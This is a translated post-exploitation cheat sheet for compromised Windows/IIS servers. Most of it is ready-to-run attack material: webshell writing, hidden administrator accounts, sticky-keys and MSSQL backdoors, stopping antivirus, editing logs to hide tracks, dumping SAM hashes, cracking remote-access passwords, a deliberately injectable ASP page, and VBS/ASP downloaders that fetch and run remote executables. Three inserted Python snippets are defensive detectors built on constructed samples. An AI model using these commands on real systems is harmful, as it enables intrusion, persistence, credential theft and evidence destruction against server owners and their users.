Reference: http://netsecurity.51cto.com/art/201312/426150_all.htm
1. Finding the path of a neighbouring site on the same IIS server
2. Use the following VBS (run it with cscript, e.g. cscript vWeb.vbs); it walks the IIS metabase and prints each site's host header binding and physical path:
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
    MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
    WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    If IsNumeric(obj3w.Name) Then
        Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
        Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
        If Err <> 0 Then WScript.Quit (1)
        WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
        ' ServerBindings entries are "IP:port:hostheader"; the third field is the host header
        For Each Binds In OService.ServerBindings
            Web = "{ " & Replace(Binds, ":", " } { ") & " }"
            WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
        Next
        WScript.Echo "Path : " & VDirObj.Path
    End If
Next
3. Enumerate with iis_spy (note: requires ASPX support; the countermeasure against IISSpy is to lower the permissions on activeds.dll and activeds.tlb).
4. When you have found the target site's directory but cannot traverse into it directly, you can still write a webshell into it from cmd with
echo ^<%execute(request("cmd"))%^> >>X:\target_dir\X.asp
(the ^ escapes < and > so cmd does not treat them as redirection), or copy an existing script over with
copy script_file X:\target_dir\X.asp
The type command can also be tried.
Likely site directories (note: typically virtual-hosting layouts):
data/htdocs.<site>/<site>/
Managing remote-access (RAS) dial-in from cmd, related notes:
# Allow administrator to dial in:
netsh ras set user administrator permit
# Deny administrator dial-in:
netsh ras set user administrator deny
# Show which users may dial in:
netsh ras show user
# Show how RAS assigns IP addresses:
netsh ras ip show ipconfig
# Assign IP addresses from a static pool:
netsh ras ip set addrassign method = pool
# Pool range 192.168.3.1 to 192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
Adding a SQL Server login from the cmd/DOS command line:
Requires administrator privileges. First create the file c:\test.qry with the following content:
exec master.dbo.sp_addlogin 'test','123'
exec master.dbo.sp_addsrvrolemember 'test','sysadmin'
Then run it from cmd (-E makes a trusted connection with the caller's Windows credentials, which is why administrator rights are needed):
cmd.exe /c isql -E -i c:\test.qry
Another way to add a user:
A newer way to add a user when net.exe has been removed and ADSI is not used. Code:
js:
var o = new ActiveXObject("Shell.Users");
z = o.create("test");
z.changePassword("123456", "");
z.setting("AccountType") = 3;
vbs:
Set o = CreateObject("Shell.Users")
Set z = o.create("test")
z.changePassword "123456", ""
z.setting("AccountType") = 3
Access control from cmd (cacls):
Commands:
cacls c: /e /t /g everyone:F      # grant Everyone full control of drive C:
cacls "directory" /d everyone     # deny Everyone, which locks out administrators as well
Note:
Countermeasure: in the folder's Security tab set Everyone to deny read. If the Security tab is missing, go to Tools > Folder Options and untick "Use simple file sharing".
3389 (RDP) related; the following work better together with pr.exe:
a. Firewall / TCP/IP filtering (disable them: net stop policyagent & net stop sharedaccess)
b. Target is on an internal network (forward the port out with lcx.exe)
c. "The terminal server has exceeded the maximum allowed number of connections" (XP: run mstsc /admin; 2003: run mstsc /console)
The " " inside the key paths below is a cmd quoting trick that passes the space in "Terminal Server" without quoting the whole path.
1. Query the terminal services port:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Enable terminal services on XP and 2003:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal services port to 2008 (hex 0x7d8); both keys must be changed, and the new port only takes effect after the service restarts or the machine reboots:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
4. Remove the XP/2003 Windows Firewall restriction on terminal services connections (adds a firewall exception for TCP 3389 from any address):
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
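The defender's counterpart to steps 1 to 4: read back the three keys with reg query and check that the two PortNumber values agree, whether the listener has been moved off 3389, and whether a matching firewall exception was added. This is an added example, not part of the original notes; the reg query output it parses is constructed to look like the registry after the commands above were run with port 2008, and the key paths are the ones the commands above write (the "Terminal Server" key spelled as reg query prints it).

```python
import re

# Keys touched by the REG ADD commands above, as reg query prints them.
TS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
WDS_KEY = TS + r"\Wds\rdpwd\Tds\tcp"
RDPTCP_KEY = TS + r"\WinStations\RDP-Tcp"
FW_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
          r"\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List")

# Constructed sample of 'reg query <key>' output for the three keys (not captured
# from a real host): RDP moved to 2008 and a second firewall exception added for it.
SAMPLE_REG_QUERY = "\n".join([
    WDS_KEY,
    "    PortNumber    REG_DWORD    0x7d8",
    "",
    RDPTCP_KEY,
    "    PortNumber    REG_DWORD    0x7d8",
    "",
    FW_KEY,
    "    3389:TCP    REG_SZ    3389:TCP:*:Enabled:@xpsp2res.dll,-22009",
    "    2008:TCP    REG_SZ    2008:TCP:*:Enabled:rdp",
    "",
])

# A value line is indented: <name> <REG_TYPE> <data>, separated by spaces or tabs.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")


def parse_reg_query(text):
    """Turn reg query output into {key_path: {value_name: (type, data)}}."""
    result, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.rstrip()
            result.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return result


def reg_dword(reg, key, name):
    """Return a REG_DWORD value as an int (reg query prints it as 0x...), or None."""
    vtype, data = reg.get(key, {}).get(name, (None, None))
    if vtype != "REG_DWORD":
        return None
    return int(data, 16) if data.lower().startswith("0x") else int(data)


def audit_rdp_port(reg):
    """Compare the two PortNumber values with each other and with the firewall list."""
    wds = reg_dword(reg, WDS_KEY, "PortNumber")
    rdp = reg_dword(reg, RDPTCP_KEY, "PortNumber")
    # Firewall entries look like "port:TCP:*:Enabled:description".
    fw_tcp = set()
    for _, (_, data) in reg.get(FW_KEY, {}).items():
        fields = data.split(":")
        if len(fields) >= 4 and fields[1].upper() == "TCP" and fields[3].lower() == "enabled":
            fw_tcp.add(int(fields[0]))
    findings = []
    if wds != rdp:
        findings.append(f"Wds\\rdpwd\\Tds\\tcp says {wds} but WinStations\\RDP-Tcp says {rdp}")
    if rdp is not None and rdp != 3389:
        findings.append(f"RDP listener moved from 3389 to {rdp}")
        if rdp in fw_tcp:
            findings.append(f"firewall exception present for the moved RDP port {rdp}")
    return {"wds": wds, "rdp_tcp": rdp, "firewall_tcp_ports": fw_tcp, "findings": findings}


def demo():
    return audit_rdp_port(parse_reg_query(SAMPLE_REG_QUERY))


if __name__ == "__main__":
    for finding in demo()["findings"]:
        print(finding)
```

On a live host, feed it the concatenated output of the three reg query commands; an RDP-Tcp PortNumber other than 0xd3d (3389) together with a matching GloballyOpenPorts entry is the footprint the procedure above leaves behind.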
Writing a VBS into the Startup folder via MySQL (the path below is the Chinese-localized All Users Startup folder):
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啓動\\a.vbs";
The portmap feature of the BS webshell forwards ports much like LCX. If the server supports ASPX, forwarding this way is somewhat stealthier (note: an often-overlooked feature).
Disabling common antivirus products (strip the ownership/permissions from the antivirus files):
Dealing with the stubborn Norton/Symantec Enterprise edition:
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "Symantec Event Notification" /y
net stop "Symantec Settings Manager" /y
McAfee:
net stop "McAfee McShield"
Symantec virus log location:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs
NOD32 quarantine (backups of detected files):
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine
Removing NOD32 settings password protection:
Delete the registry value HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID
Installing a 5x Shift (Sticky Keys) backdoor and the sethc replacement backdoor:
5x Shift / Sticky Keys backdoor (back up sethc.exe as sethc1.exe, then overwrite both the system32 copy and the dllcache copy with cmd.exe so Windows File Protection does not restore the original):
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
sethc replacement backdoor (explorer.exe instead of cmd.exe):
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
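Both variants above leave the same artefact: an accessibility binary that is a byte-for-byte copy of cmd.exe or explorer.exe, in system32 and in dllcache. The check below hashes the candidates and reports any such copy. It is an added example, not from the original notes; it generalizes beyond sethc.exe to the other helpers the logon screen can launch (utilman.exe, osk.exe, magnify.exe, narrator.exe), and runs against a constructed stand-in directory of tiny fake files rather than a real system32.

```python
import hashlib
import os
import shutil
import tempfile

# Accessibility helpers the logon screen launches as SYSTEM before anyone signs in.
# sethc.exe is the one replaced above; the same swap works on the others.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe")
# Binaries typically copied over them.
DONOR_BINARIES = ("cmd.exe", "explorer.exe", "powershell.exe")


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_accessibility_binaries(system32):
    """Return [(relative_path, donor_name)] for every accessibility binary, in system32
    or in its dllcache copy, whose content is identical to one of the donor binaries.
    dllcache is checked too because the procedure above overwrites it as well, so that
    Windows File Protection will not put the original back."""
    donors = {}
    for name in DONOR_BINARIES:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            donors[sha256_of(path)] = name
    findings = []
    for sub in ("", "dllcache"):
        for name in ACCESSIBILITY_BINARIES:
            rel = os.path.join(sub, name) if sub else name
            path = os.path.join(system32, rel)
            if os.path.isfile(path):
                digest = sha256_of(path)
                if digest in donors:
                    findings.append((rel, donors[digest]))
    return findings


def build_demo_tree():
    """Constructed stand-in for %SystemRoot%\\system32 made of tiny fake files, not real
    binaries. sethc.exe and dllcache\\sethc.exe carry the same bytes as cmd.exe, which is
    the state the two 'copy ... /y' commands above leave behind."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "dllcache"))
    fake = {
        "cmd.exe": b"MZ fake cmd.exe",
        "explorer.exe": b"MZ fake explorer.exe",
        "utilman.exe": b"MZ fake utilman.exe",                     # untouched helper
        "sethc.exe": b"MZ fake cmd.exe",                           # replaced
        os.path.join("dllcache", "sethc.exe"): b"MZ fake cmd.exe",  # replaced WFP copy
        os.path.join("dllcache", "sethc1.exe"): b"MZ fake sethc.exe",  # attacker's backup
    }
    for rel, data in fake.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


def demo():
    root = build_demo_tree()
    try:
        return check_accessibility_binaries(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, donor in demo():
        print(f"{rel} is a copy of {donor}")
```

Point it at the real %SystemRoot%\system32 to audit a host. Matching against donors only catches a straight copy; a trojanized sethc.exe that is not byte-identical to cmd.exe needs a comparison against known-good hashes or the file's Authenticode signature instead.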
Adding a hidden system account:
1. Run (net user does not list account names that end in $):
net user admin$ 123456 /add & net localgroup administrators admin$ /add
2. Export the account's two registry keys under HKLM\SAM\SAM\Domains\Account\Users (its entry under Names and its numbered RID key).
3. Delete admin$ in the user-management UI, then import the exported registry keys back.
4. Use Hacker Defender to hide the account's registry keys.
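Because steps 1 to 3 leave the account in the SAM while net user no longer shows it, the check a defender wants is a comparison of the two views: the subkeys of HKLM\SAM\SAM\Domains\Account\Users\Names (readable from a SYSTEM shell) against the table net user prints. The code below is an added example rather than part of the original notes; both inputs are constructed samples in the formats reg query and net user produce on an English XP/2003 system, and the footer it stops at ("The command completed successfully.") is localized on other language versions.

```python
# Constructed sample: 'reg query HKLM\SAM\SAM\Domains\Account\Users\Names' run as SYSTEM.
SAMPLE_REG_QUERY = "\n".join([
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names",
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator",
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\admin$",
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest",
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\HelpAssistant",
    r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0",
    "",
])

# Constructed sample of 'net user' output: names sit in three 25-character columns
# between the dashed separator and the footer. admin$ is absent, as described above.
SAMPLE_NET_USER = "\n".join([
    "",
    r"User accounts for \\WEBSRV",
    "",
    "-" * 79,
    f"{'Administrator':<25}{'Guest':<25}{'HelpAssistant'}",
    "SUPPORT_388945a0",
    "The command completed successfully.",
    "",
])


def names_from_reg_query(text):
    """Subkeys of ...\\Users\\Names as reg query prints them, one full key path per
    line; the last path component is the account name. The Names key itself is skipped."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if line.upper().startswith("HKEY_") and "\\NAMES\\" in line.upper():
            names.add(line.rsplit("\\", 1)[1])
    return names


def names_from_net_user(text):
    """Account names from net user output, parsed by fixed column position."""
    names, in_table = set(), False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        if line.lower().startswith("the command completed"):
            break
        for start in (0, 25, 50):
            name = line[start:start + 25].strip()
            if name:
                names.add(name)
    return names


def hidden_accounts(sam_names, net_user_names):
    """Accounts present in the SAM that net user does not display. Built-in accounts
    appear in both sets and cancel out; a re-imported or $-suffixed account does not."""
    return sorted(sam_names - net_user_names, key=str.lower)


def demo():
    return hidden_accounts(names_from_reg_query(SAMPLE_REG_QUERY),
                           names_from_net_user(SAMPLE_NET_USER))


if __name__ == "__main__":
    print("hidden:", demo())
```

Once step 4 (a rootkit hiding the registry keys) is in place, reg query run on the live system is lied to as well; at that point the comparison has to be made against an offline copy of the SAM hive rather than the running registry.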
Installing an MSSQL extended stored procedure backdoor (registered procedures can be listed with sp_helpextendedproc, which is where such an addition shows up):
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT EXEC ON xp_helpsystem TO public;
Dealing with the server's MSFTP logs:
In C:\WINNT\system32\LogFiles\MSFTPSVC1\ there are three files: ex011120.log, ex011121.log and ex011124.log. Deleting ex011124.log directly fails with "the source file ... is in use", because the service keeps the current day's log open.
ex011120.log and ex011121.log can of course be deleted directly. Then open ex011124.log in Notepad, remove the relevant entries, save and overwrite; that succeeds.
After stopping the msftpsvc service, ex011124.log can be deleted directly as well.
Clearing the MSSQL Query Analyzer connection history:
MSSQL 2000 stores it in the registry at:
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
Find the entries for the servers you connected to and delete them.
MSSQL 2005 stores it in:
C:\Documents and Settings\<user profile>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
Avoiding interception by aggressive host-security software: fetch the shell remotely with this ASP:
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
    Dim Ads, Retrieval, GetRemoteData
    On Error Resume Next
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "Get", s_RemoteFileUrl, False, "", ""
        .Send
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        .SaveToFile Server.MapPath(s_LocalFileName), 2
        .Cancel()
        .Close()
    End With
    Set Ads = Nothing
End Sub
eWebEditor_SaveRemoteFile "your shell's name", "your shell's URL"
%>
Since the file on disk contains only the downloader, this also hides the shell itself and can serve as a very stealthy backdoor, whereas the so-called AV-evading webshells are all flagged as soon as a server security tool scans the disk.
Privilege escalation via VNC, Radmin and PcAnywhere:
VNC: first read the encrypted password VNC keeps in the registry through the shell, then crack it with the VNC4X tool.
Registry location: HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin: the default port is 4899. First obtain the password hash and the port from:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter   // password (hash) registry location
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port        // port registry location
Then connect with the hash-login version of the Radmin client.
PcAnywhere: if we have a webshell on a host and find PcAnywhere installed, and the directory holding its saved password file is readable by our IUSR account, we can download the CIF file, crack it locally and log on to the server with PcAnywhere from our own machine.
The CIF file holding the password is not in PcAnywhere's installation directory but on the drive PcAnywhere was installed to, under:
\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
For example, if PcAnywhere is installed in D:\program\, its password file is in D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\.
Privilege escalation and adding users via WinWebMail:
WinWebMail requires its web directory to be readable and writable by Everyone. Find the WinWebMail shortcut under Start > Programs, read its target path, browse to <path>\web and upload a shell. The shell runs as SYSTEM; drop your remote-control tool into the startup items and wait for the next reboot.
If the cmd component has not been removed you can add a user directly. The 7i24 web directory is also writable, with administrator privileges.
Building an injection point with 1433 SA privileges (the ASP below concatenates request("id") straight into the query on purpose, so anyone who knows the URL has an injection point backed by the SA connection):
<%
strSQLServerName = "server ip"
strSQLDBUserName = "database account"
strSQLDBPassword = "database password"
strSQLDBName = "database name"
Set conn = server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
Dim rs, strSQL, id
Set rs = server.CreateObject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & id
rs.open strSQL, conn, 1, 3
rs.Close
%>
Privilege escalation:
Run systeminfo first and read the installed hotfix list.
Token kidnapping (pr.exe): patched by KB956572
Churrasco: patched by KB952004
Packing with RAR from the command line:
rar a -k -r -s -m3 c:\1.rar c:\folder
System information collection script:
For Windows:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo.
schtasks /query
echo.
echo ####task-list#############
tasklist /svc
echo.
echo ####net-work information
ipconfig /all
route print
arp -a
netstat -an
ipconfig /displaydns
echo.
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree /F
Getting the local hashes when gethash is detected by antivirus:
First export the registry:
Windows 2000: regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
Windows 2003: reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg
Mind the permissions: by default the SAM key is not readable even by administrators, so grant yourself Full Control on it first (this matters for interactive logons; a SYSTEM shell can skip it).
The rest is simple: download the exported file, change the registry path in its header, import it on your own machine, then run the hash-dumping tool against your local accounts.
After dumping the hashes, remember to change your own account password back!
When GetHashes cannot obtain the hashes, use IceSword to copy the SAM file to the desktop. As far as I know, someone used this method on virtual machines he had repeatedly locked himself out of by forgetting the password.
VBS downloaders:
1. Built line by line with echo (http://xxxx/e.exe stands for the download URL):
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>c:\windows\cftmon.vbs
echo xPost.Open "GET","http://xxxx/e.exe",0 >>c:\windows\cftmon.vbs
echo xPost.Send() >>c:\windows\cftmon.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cscript c:\windows\cftmon.vbs
2. Taking the URL and local path as arguments (the object names are assembled from pieces to dodge simple signature matching):
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
Usage:
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
Directory tricks in cmd (inside a batch file write %%i instead of %i):
List all directories under d:\freehost:
for /d %i in (d:\freehost\*) do @echo %i
Show only the folders in the current directory whose names are 1 to 3 characters long:
for /d %i in (???) do @echo %i
Starting from the current directory, list every EXE in it and in all its subdirectories:
for /r %i in (*.exe) do @echo %i
Starting from a specified directory, list all files in it and in all its subdirectories:
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
This prints the contents of c:\1.txt: with /f the file is read line by line (with the default delimiters only the first space- or tab-separated token of each line is echoed):
for /f %i in (c:\1.txt) do echo %i
delims= sets the delimiter (here a space) and tokens= selects which field to take:
for /f "tokens=2 delims= " %i in (a.txt) do echo %i
Common paths on Windows systems (replace c: with d: or e:; virtual-hosting panels such as FreeHost (星外) and HZHost (華衆) are usually installed on d:):
c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe
c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\7i24虛擬主機管理平臺\自動設置[受控端].lnk
C:\Documents and Settings\All Users\「開始」菜單\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文檔.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文檔.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmail\Foxmail.exe
C:\Program Files\Foxmail\accounts.cfg
C:\Program Files\tencent\Foxmail\Foxmail.exe
C:\Program Files\tencent\Foxmail\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\騰訊遊戲\QQGAME\readme.txt
c:\Program Files\tencent\騰訊遊戲\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe
Relative paths of configuration files for various web applications (each file is tried at the web root, in the current directory, and one to three levels up):
/config.php ../../config.php ../config.php ../../../config.php
/config.inc.php ./config.inc.php ../../config.inc.php ../config.inc.php ../../../config.inc.php
/conn.php ./conn.php ../../conn.php ../conn.php ../../../conn.php
/conn.asp ./conn.asp ../../conn.asp ../conn.asp ../../../conn.asp
/config/config.php ../../config/config.php ../config/config.php ../../../config/config.php
/config/config.inc.php ./config/config.inc.php ../../config/config.inc.php ../config/config.inc.php ../../../config/config.inc.php
